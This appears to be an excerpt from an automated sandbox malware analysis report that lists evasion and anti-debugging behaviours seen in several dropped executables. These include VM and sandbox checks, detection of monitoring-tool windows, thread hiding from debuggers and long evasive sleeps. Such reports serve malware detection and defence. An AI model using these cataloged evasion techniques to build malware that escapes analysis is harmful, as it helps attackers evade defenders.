Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\59B4.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\59B4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: F72D.exe, 0000000D.00000002.797219743.0000000001FF0000.00000004.00000001.sdmp Binary or memory string: ASWHOOK
Source: y4oMrtO1Mt.exe, 00000001.00000002.725871368.0000000002100000.00000004.00000001.sdmp Binary or memory string: ASWHOOKW0
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 4780 Thread sleep count: 593 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 2248 Thread sleep count: 267 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5296 Thread sleep count: 326 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5296 Thread sleep time: -32600s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 616 Thread sleep count: 326 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4792 Thread sleep count: 175 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1052 Thread sleep count: 230 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6640 Thread sleep count: 339 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1568 Thread sleep count: 206 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe TID: 5392 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\8039.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\8039.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 593 Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D276B90 rdtsc 23_2_6D276B90
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 8039.exe, 00000016.00000002.947294961.0000000000B60000.00000004.00000020.sdmp Binary or memory string: VMware
Source: explorer.exe, 00000005.00000000.694802173.000000000FD02000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.692915166.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 8039.exe, 00000016.00000002.947019829.0000000000B0A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
Source: explorer.exe, 00000005.00000000.716863699.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.692915166.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.706261593.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000005.00000000.694802173.000000000FD02000.00000004.00000001.sdmp Binary or memory string: c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&b
Source: 8039.exe, 00000016.00000002.947294961.0000000000B60000.00000004.00000020.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareR8SZCTXCWin32_VideoController5UGTV26XVideoController120060621000000.000000-00088702277display.infMSBDAW1MK44M8PCI\VEN_15AD&DEV_04qD
Source: explorer.exe, 00000005.00000000.688028837.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.706261593.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.706350974.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp, 610B.exe, 0000001B.00000002.942712473.000000000076C000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Thread information set: HideFromDebugger Jump to behavior
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 0_2_00422950 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00422950
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 10_2_02BD0042 push dword ptr fs:[00000030h] 10_2_02BD0042
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 12_2_02E1B863 push dword ptr fs:[00000030h] 12_2_02E1B863
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318D34 mov eax, dword ptr fs:[00000030h] 23_2_6D318D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D271520 mov eax, dword ptr fs:[00000030h] 23_2_6D271520
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D271520 mov eax, dword ptr fs:[00000030h] 23_2_6D271520
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D271520 mov eax, dword ptr fs:[00000030h] 23_2_6D271520
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D271520 mov eax, dword ptr fs:[00000030h] 23_2_6D271520
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D271520 mov eax, dword ptr fs:[00000030h] 23_2_6D271520
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253D34 mov eax, dword ptr fs:[00000030h] 23_2_6D253D34
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24AD30 mov eax, dword ptr fs:[00000030h] 23_2_6D24AD30
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274D3B mov eax, dword ptr fs:[00000030h] 23_2_6D274D3B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274D3B mov eax, dword ptr fs:[00000030h] 23_2_6D274D3B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274D3B mov eax, dword ptr fs:[00000030h] 23_2_6D274D3B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D303518 mov eax, dword ptr fs:[00000030h] 23_2_6D303518
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D303518 mov eax, dword ptr fs:[00000030h] 23_2_6D303518
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D303518 mov eax, dword ptr fs:[00000030h] 23_2_6D303518
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F51D mov eax, dword ptr fs:[00000030h] 23_2_6D24F51D
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26C577 mov eax, dword ptr fs:[00000030h] 23_2_6D26C577
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26C577 mov eax, dword ptr fs:[00000030h] 23_2_6D26C577
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24354C mov eax, dword ptr fs:[00000030h] 23_2_6D24354C
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24354C mov eax, dword ptr fs:[00000030h] 23_2_6D24354C
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F8D47 mov eax, dword ptr fs:[00000030h] 23_2_6D2F8D47
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D283D43 mov eax, dword ptr fs:[00000030h] 23_2_6D283D43
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C3540 mov eax, dword ptr fs:[00000030h] 23_2_6D2C3540
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F3D40 mov eax, dword ptr fs:[00000030h] 23_2_6D2F3D40
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D267D50 mov eax, dword ptr fs:[00000030h] 23_2_6D267D50
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2735A1 mov eax, dword ptr fs:[00000030h] 23_2_6D2735A1
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D271DB5 mov eax, dword ptr fs:[00000030h] 23_2_6D271DB5
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D271DB5 mov eax, dword ptr fs:[00000030h] 23_2_6D271DB5
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D271DB5 mov eax, dword ptr fs:[00000030h] 23_2_6D271DB5
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30B581 mov eax, dword ptr fs:[00000030h] 23_2_6D30B581
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30B581 mov eax, dword ptr fs:[00000030h] 23_2_6D30B581
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30B581 mov eax, dword ptr fs:[00000030h] 23_2_6D30B581
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30B581 mov eax, dword ptr fs:[00000030h] 23_2_6D30B581
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D243591 mov eax, dword ptr fs:[00000030h] 23_2_6D243591
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2795EC mov eax, dword ptr fs:[00000030h] 23_2_6D2795EC
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2495F0 mov eax, dword ptr fs:[00000030h] 23_2_6D2495F0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2495F0 mov ecx, dword ptr fs:[00000030h] 23_2_6D2495F0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F8DF1 mov eax, dword ptr fs:[00000030h] 23_2_6D2F8DF1
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2415C1 mov eax, dword ptr fs:[00000030h] 23_2_6D2415C1
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FFDD3 mov eax, dword ptr fs:[00000030h] 23_2_6D2FFDD3
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27BC2C mov eax, dword ptr fs:[00000030h] 23_2_6D27BC2C
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D262430 mov eax, dword ptr fs:[00000030h] 23_2_6D262430
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D262430 mov eax, dword ptr fs:[00000030h] 23_2_6D262430
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D244439 mov eax, dword ptr fs:[00000030h] 23_2_6D244439
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25FC01 mov eax, dword ptr fs:[00000030h] 23_2_6D25FC01
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25FC01 mov eax, dword ptr fs:[00000030h] 23_2_6D25FC01
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25FC01 mov eax, dword ptr fs:[00000030h] 23_2_6D25FC01
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25FC01 mov eax, dword ptr fs:[00000030h] 23_2_6D25FC01
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318C14 mov eax, dword ptr fs:[00000030h] 23_2_6D318C14
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D301C06 mov eax, dword ptr fs:[00000030h] 23_2_6D301C06
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D301C06 mov eax, dword ptr fs:[00000030h] 23_2_6D301C06
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D301C06 mov eax, dword ptr fs:[00000030h] 23_2_6D301C06
